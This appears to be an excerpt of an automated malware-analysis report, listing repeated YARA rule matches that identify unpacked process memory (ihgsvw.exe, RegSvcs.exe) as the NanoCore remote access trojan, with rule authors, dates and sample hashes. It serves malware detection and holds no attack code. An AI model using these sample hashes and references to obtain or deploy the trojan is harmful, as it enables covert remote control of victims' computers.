Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
